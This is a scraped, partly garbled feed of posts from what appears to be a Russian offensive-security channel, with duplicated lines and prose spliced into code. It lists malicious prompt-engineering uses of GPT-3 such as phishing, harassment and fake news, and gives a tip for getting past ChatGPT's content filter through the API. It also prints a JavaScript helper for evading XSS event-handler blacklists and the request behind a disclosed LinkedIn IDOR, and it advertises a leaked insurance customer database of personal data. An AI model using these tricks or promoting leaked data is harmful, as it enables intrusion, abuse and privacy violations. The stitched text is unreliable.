Creatively malicious prompt engineering.pdf
2.1 MB
Creatively malicious prompt engineering
Phishing content: Emails or messages designed to trick a user into opening a malicious attachment or visiting a malicious link
Social opposition: Social media messages designed to troll and harass individuals or to cause brand damage
Social validation: Social media messages designed to advertise or sell, or to legitimize a scam
Style transfer: A technique designed to coax the model into using a particular writing style
Opinion transfer: A technique designed to coax the model into writing about a subject in a deliberately opinionated way
Prompt creation: A way of asking the model to generate prompts based on content
Fake news: Research into how well GPT-3 can generate convincing fake news articles of events that weren’t part of its training set
Phishing content: Emails or messages designed to trick a user into opening a malicious attachment or visiting a malicious link
Social opposition: Social media messages designed to troll and harass individuals or to cause brand damage
Social validation: Social media messages designed to advertise or sell, or to legitimize a scam
Style transfer: A technique designed to coax the model into using a particular writing style
Opinion transfer: A technique designed to coax the model into writing about a subject in a deliberately opinionated way
Prompt creation: A way of asking the model to generate prompts based on content
Fake news: Research into how well GPT-3 can generate convincing fake news articles of events that weren’t part of its training set
https://www.perimeterx.com/tech-blog/2019/list-every-event-that-exists-in-the-browser/
Проще всего так
Проще всего так
Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');})
ТакObject.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(window))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');}).filter(function(elem, pos, self){return self.indexOf(elem) == pos;})
Или так[...new Set([Поможет для эксплуатации xss'ок на случай, если сервис использует блэклисты на определенные эвент хэндлеры.
...Object.getOwnPropertyNames(document),
...Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document))),
...Object.getOwnPropertyNames(Object.getPrototypeOf(window)),
].filter(k => k.startsWith("on") && (document[k] == null || typeof document[k] == "function")))];
HUMAN Security
Blog | HUMAN Security
Check out the latest HUMAN Blogs for expert insights and industry expertise on digital threats.
Две недели назад дисклоузнули уязвимость, которая позволяла удалить любой чужой пост на LinkedIn.
IDOR оценили в $10,000.
POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1где
Host: www.linkedin.com
{"objectUrn":"urn:li:activity:6390481093803499520"}
objectUrn — ID чужого поста.IDOR оценили в $10,000.
https://github.com/quarkslab/pastis
The PASTIS project is a fuzzing framework aiming at combining various software testing techniques within the same workflow to perform collaborative fuzzing also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
The PASTIS project is a fuzzing framework aiming at combining various software testing techniques within the same workflow to perform collaborative fuzzing also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
GitHub
GitHub - quarkslab/pastis: PASTIS: Collaborative Fuzzing Framework
PASTIS: Collaborative Fuzzing Framework. Contribute to quarkslab/pastis development by creating an account on GitHub.
Cybred
Две недели назад дисклоузнули уязвимость, которая позволяла удалить любой чужой пост на LinkedIn. POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1 Host: www.linkedin.com {"objectUrn":"urn:li:activity:6390481093803499520"} где objectUrn…
chatgpt-for-bugbounty-.pdf
1.1 MB
Наверстываем
Обход цензуры ChatGPT с помощью запросов к API.
1. Устанавливаем jq
2. Указываем в переменные окружения CHATGPT_TOKEN отсюда https://platform.openai.com/account/api-keys
3. Пользуемся
1. Устанавливаем jq
2. Указываем в переменные окружения CHATGPT_TOKEN отсюда https://platform.openai.com/account/api-keys
3. Пользуемся
Репозиторий с огромным списком PoC'ов для многих CVE, начиная с 2008 года https://github.com/nomi-sec/PoC-in-GitHub.
Автонаполняемый, существует отдельный сайт https://poc-in-github.motikan2010.net/.
Автонаполняемый, существует отдельный сайт https://poc-in-github.motikan2010.net/.
GitHub
GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
📡 PoC auto collect from GitHub. ⚠️ Be careful Malware. - nomi-sec/PoC-in-GitHub
Утекшая база клиентов "Альфастрахования". Примечательна тем, что содержит много корпоративных учеток наносеков из Магнита, X5, Сбера и других "топовых" компаний. Всего в сливе более 1 миллиона строк с ФИО, телефонами, почтами и хешами паролей.